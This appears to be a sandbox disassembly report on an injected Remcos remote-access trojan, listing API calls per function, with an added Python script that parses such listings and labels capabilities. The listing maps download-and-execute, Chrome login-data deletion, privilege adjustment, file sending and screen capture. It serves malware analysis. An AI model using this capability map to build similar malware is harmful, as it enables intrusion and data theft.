                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                  • String ID:
                  • API String ID: 1771804793-0
                  • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                  • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                  • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                  • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                  APIs
                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DownloadExecuteFileShell
                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
                  • API String ID: 2825088817-2881483049
                  • Opcode ID: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                  • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                  • Opcode Fuzzy Hash: 78e10e9a612b22b91ebf8b2931271f85cca1af5336b97d423d0fb1973267ad11
                  • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$FirstNextsend
                  • String ID: XPG$XPG
                  • API String ID: 4113138495-1962359302
                  • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                  • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                  • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                  • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: PkGNG
                  • API String ID: 0-263838557
                  • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                  • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                  • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                  • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
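The per-function blocks above are a compact capability map of the injected Remcos payload: DeleteFileA against the Chrome Login Data path with the "[Chrome StoredLogins found, cleared!]" string at 0040BA4E, LookupPrivilegeValueA/AdjustTokenPrivileges for SeShutdownPrivilege at 00417978, OpenSCManagerW/StartServiceW at 0041AA53, the FindResourceA/LockResource pair that loads the SETTINGS resource at 0041B4B9, URLDownloadToFileW next to ShellExecuteW("open") at 00406FBC, and FindFirstFileW feeding a send subcall at 00407857. The following Python script is an added example, not Joe Sandbox code and not part of the analysed sample: it parses listing text in exactly this format (APIs / Strings / Similarity sections, "• Part of subcall function" entries, "$"-joined String IDs) into one record per function and labels each with the capabilities those API and string combinations imply. The capability labels and rules are the editor's own heuristics, and the embedded sample text is a constructed excerpt copied from the blocks above and trimmed to the lines the parser reads.

```python
# Triage helper for per-function listings in the format above. Added example, not
# Joe Sandbox code; the capability rules below are the editor's own heuristics.
import re
from dataclasses import dataclass, field

# Constructed sample: seven blocks copied from this page's listing, trimmed.
SAMPLE = r"""APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
Strings
• [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
Similarity
• String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
APIs
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Similarity
• String ID: SeShutdownPrivilege
APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
APIs
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
• URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
Similarity
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$open
APIs
• FindResourceA.KERNEL32 ref: 0041B4B9
• LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
Similarity
• String ID: SETTINGS
APIs
• FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
Similarity
• String ID: XPG$XPG
Strings
Similarity
• String ID: PkGNG"""
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?([\w@]+)\.(\w+)")
REF_RE = re.compile(r"\bref:\s*([0-9A-Fa-f]+)")
SID_RE = re.compile(r"^•\s*String ID:\s*(.*)$")

@dataclass
class FuncBlock:
    first_ref: str = ""   # address of the block's first direct API call
    apis: list = field(default_factory=list)      # (name, module, via_subcall)
    strings: list = field(default_factory=list)   # Strings items + String ID parts
    corpus: str = ""      # every item line of the block, for substring rules
    capabilities: list = field(default_factory=list)

def parse_blocks(text):
    # A block starts at "APIs", or at any header once "Similarity" (last section) was seen.
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if cur is None or line == "APIs" or section == "Similarity":
                blocks.append(cur := FuncBlock())
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue
        cur.corpus += line + "\n"
        if section == "APIs" and (m := API_RE.match(line)):
            subcall = "Part of subcall" in line
            cur.apis.append((m.group(1), m.group(2), subcall))
            r = REF_RE.search(line)
            if r and not subcall and not cur.first_ref:
                cur.first_ref = r.group(1)
        elif section == "Strings":
            cur.strings.append(line.lstrip("• ").rsplit(", xrefs:", 1)[0])
        elif section == "Similarity" and (m := SID_RE.match(line)):
            cur.strings += [s for s in m.group(1).split("$") if s]
    return blocks

# (label, APIs that must all be present, substrings that must all appear in the block)
RULES = [
    ("clears Chrome saved logins", {"DeleteFileA"}, ("Login Data",)),
    ("enables SeShutdownPrivilege", {"LookupPrivilegeValueA", "AdjustTokenPrivileges"}, ("SeShutdownPrivilege",)),
    ("suspends host via PowrProf!SetSuspendState", set(), ("PowrProf.dll", "SetSuspendState")),
    ("starts a Windows service", {"OpenSCManagerW", "StartServiceW"}, ()),
    ("reads embedded SETTINGS resource (config)", {"FindResourceA", "LockResource"}, ("SETTINGS",)),
    ("download-and-execute", {"URLDownloadToFileW", "ShellExecuteW"}, ()),
    ("file enumeration with network send", {"FindFirstFileW", "send"}, ()),
]

def triage(text):
    blocks = parse_blocks(text)
    for b in blocks:
        names = {name for name, _, _ in b.apis}
        b.capabilities = [label for label, apis, needles in RULES
                          if apis <= names and all(n in b.corpus for n in needles)]
    return blocks
if __name__ == "__main__":
    for b in triage(SAMPLE):
        print(f"func@{b.first_ref or '????????'}: {', '.join(b.capabilities) or '-'}")
```

Run as a script it prints one line per function with its address and labels; paste a whole listing into SAMPLE (or read it from a file) to triage a full report, and extend RULES for other families. Substring rules are matched against every item line of the block, including API argument text, which is why the SeShutdownPrivilege function is labelled even though its Strings section is empty; subcall entries count towards the API set but never supply first_ref, so the address reported is always the function's own.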
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                  • String ID: sJD
                  • API String ID: 1661935332-3536923933
                  • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                  • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                  • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                  • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorInfoLastLocale$_free$_abort
                  • String ID:
                  • API String ID: 2829624132-0
                  • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                  • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                  • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                  • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                  APIs
                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$AcquireRandomRelease
                  • String ID:
                  • API String ID: 1815803762-0
                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                  • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                  • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Clipboard$CloseDataOpen
                  • String ID:
                  • API String ID: 2058664381-0
                  • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                  • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                  • Opcode Fuzzy Hash: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
                  • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                  • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                  • Opcode Fuzzy Hash: 467a2b870f27eeaba5f3d85303d6c443c91537f9433fd9512f86f3d9895b4a39
                  • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                  • String ID: lJD
                  • API String ID: 1084509184-3316369744
                  • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                  • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                  • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                  • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                  • String ID: lJD
                  • API String ID: 1084509184-3316369744
                  • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                  • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                  • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                  • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID: GetLocaleInfoEx
                  • API String ID: 2299586839-2904428671
                  • Opcode ID: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                  • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                  • Opcode Fuzzy Hash: 2ed918041740e922be2658b84ad46ef82702f2d46b5b06d040e10602c5128833
                  • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                  • HeapFree.KERNEL32(00000000), ref: 004120EE
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$FreeProcess
                  • String ID:
                  • API String ID: 3859560861-0
                  • Opcode ID: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                  • Instruction ID: eee285bae3a3c664d400e4c5f5e220380537cd22e0998a3ce94cd1697e41dfe3
                  • Opcode Fuzzy Hash: bbc8ffc4057debe9872561f5e92b4f6919ce40f9ddced797a216f9a420f6d04b
                  • Instruction Fuzzy Hash: 16112A32000B11EFC7305F64DE85957BBE9FF08715314892EE29696921CB76FCA0CB58
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$_free$InfoLocale_abort
                  • String ID:
                  • API String ID: 1663032902-0
                  • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                  • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                  • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                  • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$InfoLocale_abort_free
                  • String ID:
                  • API String ID: 2692324296-0
                  • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                  • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                  • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                  • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                  APIs
                  • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: NameUser
                  • String ID:
                  • API String ID: 2645101109-0
                  • Opcode ID: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                  • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                  • Opcode Fuzzy Hash: 3d7d98170efc6b6b629f93dc404fb63378f1138ab074e43b779f7395dc78dc1a
                  • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                  APIs
                    • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(?,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                  • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CriticalEnterEnumLocalesSectionSystem
                  • String ID:
                  • API String ID: 1272433827-0
                  • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                  • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                  • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                  • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                  • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                  • String ID:
                  • API String ID: 1084509184-0
                  • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                  • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                  • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                  • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                  APIs
                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.0 Pro), ref: 0040F8E5
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID:
                  • API String ID: 2299586839-0
                  • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                  • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                  APIs
                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                  • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                    • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                  • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                  • DeleteDC.GDI32(00000000), ref: 00418F2A
                  • DeleteDC.GDI32(00000000), ref: 00418F2D
                  • DeleteObject.GDI32(00000000), ref: 00418F30
                  • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                  • DeleteDC.GDI32(00000000), ref: 00418F62
                  • DeleteDC.GDI32(00000000), ref: 00418F65
                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                  • GetIconInfo.USER32 ref: 00418FBD
                  • DeleteObject.GDI32(?), ref: 00418FEC
                  • DeleteObject.GDI32(?), ref: 00418FF9
                  • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                  • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                  • DeleteDC.GDI32(?), ref: 0041917C
                  • DeleteDC.GDI32(00000000), ref: 0041917F
                  • DeleteObject.GDI32(00000000), ref: 00419182
                  • GlobalFree.KERNEL32(?), ref: 0041918D
                  • DeleteObject.GDI32(00000000), ref: 00419241
                  • GlobalFree.KERNEL32(?), ref: 00419248
